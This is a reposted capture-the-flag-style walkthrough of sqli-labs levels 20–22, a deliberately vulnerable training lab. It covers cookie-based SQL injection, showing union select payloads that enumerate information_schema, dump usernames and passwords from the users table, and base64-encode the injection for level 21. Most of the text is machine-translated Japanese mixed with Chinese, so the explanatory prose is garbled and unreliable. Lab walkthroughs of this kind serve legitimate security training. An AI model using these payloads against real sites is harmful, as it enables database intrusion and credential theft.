20-22の障壁によるSQL-ラボブレーク

LESS20

1. 20オフを入力した後、私たちは、ログのuname =管理者、そして、我々はまた、げっぷを動作させるために使用することができ、注射を動作させるためにストーブのブラウザにプラグインクッキーエディタを使用することができCOOKIEを、生成しました。

 

2.次に、我々はのuname管理者に置き換えられますプラグインクッキーエディタの操作の使用を通じて行わ」、ページを更新して保存し、結果は構文エラーを示唆して、我々はインジェクションの脆弱性を決定する必要があります。

 

 3.注入文の構成を
入力組合1,2,3#を選択   

 

 私たちは、実際に裁判官によって、列の順序によるステップの数がある前に、私は、あなたが入力することができます省略された、エコーの位置を決定するために、各列の成功を見る3#順」と判断されます

4.ライブラリのチェック
入力:組合は1,2、GROUP_CONCAT(選択 information_schema.schemata#からSCHEMA_NAMEを)

 

 


5.查表
输入:セキュリティ'#」連合INFORMATION_SCHEMA.TABLES TABLE_SCHEMA =から1,2、GROUP_CONCAT(TABLE_NAME)を選択します'

 

 


6.列查
输入:ユーザー'#」を組合がtable_nameは= information_schema.columnsから1,2、GROUP_CONCAT(COLUMN_NAME)を選択'

 

 


7.查字段
输入:' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users#

 

 


LESS21
1.使用我们已知的用户名密码登录(admin),我们发现uname=YWRtaW4,其实这就是对Cookie进行了BASE64编码转换。

 

 2.来到在线解密工具(URL:https://tool.oschina.net/encrypt?type=3),对YWRtaW4=解密。 

 

 3.构造注入语句。

 

 经过测试我们可以发现需要用 ’)进行包裹。
输入:') union select 1,2,3# 
经过转码后:JykgdW5pb24gc2VsZWN0IDEsMiwzIw==

 

 好了,我们已经知道注入格式了,接下来的步骤与20关相同,可以参考,记得转码保存后刷新页面。


LESS22

这一关只是在注入构造语句上与less21不一样。

less-21是:') union select 1,2,3#

less-22是:" union select 1,2,3#

 

至此,sqli-labs基础部分全部完成。

 

おすすめ

転載: www.cnblogs.com/c1047509362/p/12399271.html